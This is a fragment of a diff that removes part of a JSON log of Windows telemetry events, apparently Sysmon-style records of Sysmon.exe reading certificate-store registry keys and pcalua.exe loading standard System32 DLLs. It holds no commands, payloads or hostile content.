}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pcaui.dll", - "image_path": "C:\\Windows\\System32\\pcaui.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wer.dll", - "image_path": "C:\\Windows\\System32\\wer.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dui70.dll", - "image_path": "C:\\Windows\\System32\\dui70.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 